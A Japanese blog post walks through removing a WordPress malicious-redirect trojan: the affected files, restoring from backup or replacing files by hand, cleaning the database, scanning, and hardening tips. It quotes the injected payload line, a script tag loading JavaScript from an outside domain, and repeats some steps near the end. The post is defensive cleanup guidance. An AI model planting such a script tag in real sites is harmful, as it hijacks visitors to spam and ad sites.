WordPressは多くの外国貿易向け独立サイトの第一選択肢であり、全世界のウェブサイトの35%がWordPressを使用しています。エコシステムが成熟しており、PluginやThemeも非常に豊富です。そのため、WordPressのセキュリティも重要です。今日、ある外国貿易向けサイトが正常にアクセスできず、サイトを開くと他のスパムサイトにリダイレクトされてしまいました。明らかにウイルスに感染し、悪意のあるリダイレクトが行われています。Naibaはここに記録します。
他のサイトへの悪意のあるリダイレクトを行うWordPressウイルス・トロイの木馬スクリプトをどのように駆除するか。
ウイルスの状態
この悪意のあるリダイレクトウイルス自体は、サイトデータに直接的な損害を与えるものではありませんが、悪意のあるスクリプトを挿入してサイトを開けなくし、サイトのトラフィックをハイジャックして他のサイトにリダイレクトし、ユーザーを騙してブラウザ通知を許可させた後、ブラウザに広告をポップアップ表示することで利益を得ます。(もしあなたがちょうど被害に遭った場合は、
Windows10システム右下のChromeポップアップ広告を閉じる方法)
ウイルスの原理
このウイルスの原理は、何らかの脆弱性を利用してサイトの一部ファイルデータ(一部のトロイの木馬はデータベースにも挿入します)を改ざんし、悪意のあるスクリプトを挿入することです。ユーザーがサイトにアクセスすると、スクリプトが実行され、自動的にトラフィックをハイジャックして悪意のあるサイトにリダイレクトします。 Naibaが今日遭遇したこのトロイの木馬スクリプトは、サイトに以下のスクリプトを挿入していました:
<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>
悪意のあるスクリプトは、サイト上のいくつかのファイルに挿入されています。例えば以下のファイルです(これらだけではありません):
- index.php
- wp-config.php
- wp-settings.php
- wp-load.php
- .htaccess
Themeファイル (wp-content/themes/{themeName}/)
- footer.php
- header.php
- functions.php
一部のPluginのファイルも汚染されることがあります。
駆除方法
Naibaが今日遭遇したこのトロイの木馬は、サイトファイルデータを変更しただけでなく、同時にデータベースも汚染していました。そのため、ファイルとデータベースのウイルスを同時に駆除する必要があり、サイトを正常に復元できます。
方法1:ウェブサイトのバックアップデータを使用して復元する
もしバックアップの習慣があれば、以前にバックアップしたサイトのデータベースとファイルを直接復元することができます。これが最も速い解決方法です。 関連記事:
方法2:手動でトロイの木馬スクリプトを削除する
もしバックアップがない場合は、かなり面倒です。手動でトロイの木馬スクリプトをクリーンアップする必要があります。 1、ファイルマネージャー(cPanel、宝塔パネル、FTPなど)を使用してサイトのルートディレクトリにアクセスし、index.phpを開きます。ファイルの最初に悪意のあるスクリプトが挿入されているのが確認できます。下図の通りです:
Themeファイルをチェックすると、以下のコードが挿入されているのがわかります:
2、サイト上で感染したすべてのファイルを削除します。 もちろん、これらのファイルを一つ一つチェックして削除するのは大変な作業ですので、アップロードしたフォルダを残し、他のフォルダをすべて削除し、
最新のWordPressインストールパッケージをダウンロードアップロードして上書きします。 3、安全なサイトファイルをサーバーにアップロードします。 4、データベースのバックエンドに入り、汚染されたデータベースの内容をクリーンアップします。
上の図は、データベース内で発見された悪意のあるスクリプトデータです。手動でこれを削除する必要があります。 5、Wordfenceをインストールしてサイトファイルをスキャンし、見逃しがないか確認します。 ここまでで、サイト上の悪意のあるスクリプトファイルはクリーンアップされており、サイトは正常にアクセスできるはずです。
セキュリティ保護
ウイルスの除去が完了しました。再びハッキングされるのを防ぐために、WordPressのセキュリティ対策を行う必要があります。Naibaが皆さんにまとめた経験則は以下の通りです:
- 管理者アカウントには必ず安全なパスワードを設定し、できればWordPressが自動生成するような高強度のパスワードを使用してください。
- WordPressのバージョンとPluginのバージョンを最新に保ちましょう。多くの外国貿易向け独立サイトは決して更新されず、脆弱性のあるバージョンに遭遇してしまうのは避けられません。
- 出所不明のThemeやPluginはインストールしないでください。クラック版は安全性が保証されていない場合、インストールしないのが最善です。
- サーバーのセキュリティも考慮する必要があります。サーバーソフトウェアのバージョンを最新に保ち、安全なパスワードを使用してください。
- セキュリティPluginをインストールすることもできますが、経験上、強力なウイルスに遭遇した場合、セキュリティPluginも無力です。
したがって、総合的に見て、最も安全な方法は、パスワードの安全性を確保し、無闇にPluginやThemeをインストールせず、バージョンを最新に保つことです。最後に、もしあなたのサイトのマルウェアがまだ除去されていない場合は、Naibaに連絡して有償で対応してもらうことができます。
Themeファイルをチェックすると、以下のコードが挿入されているのがわかります:
2、サイト上で感染したすべてのファイルを削除します。 もちろん、これらのファイルを一つ一つチェックして削除するのは大変な作業ですので、アップロードしたフォルダを残し、他のフォルダをすべて削除し、最新のWordPressインストールパッケージをダウンロードアップロードして上書きします。 3、安全なサイトファイルをサーバーにアップロードします。 4、データベースのバックエンドに入り、汚染されたデータベースの内容をクリーンアップします。
コメントは終了しました
この記事のコメント機能は終了しています。ご質問がある場合は、他の方法でお問い合わせください。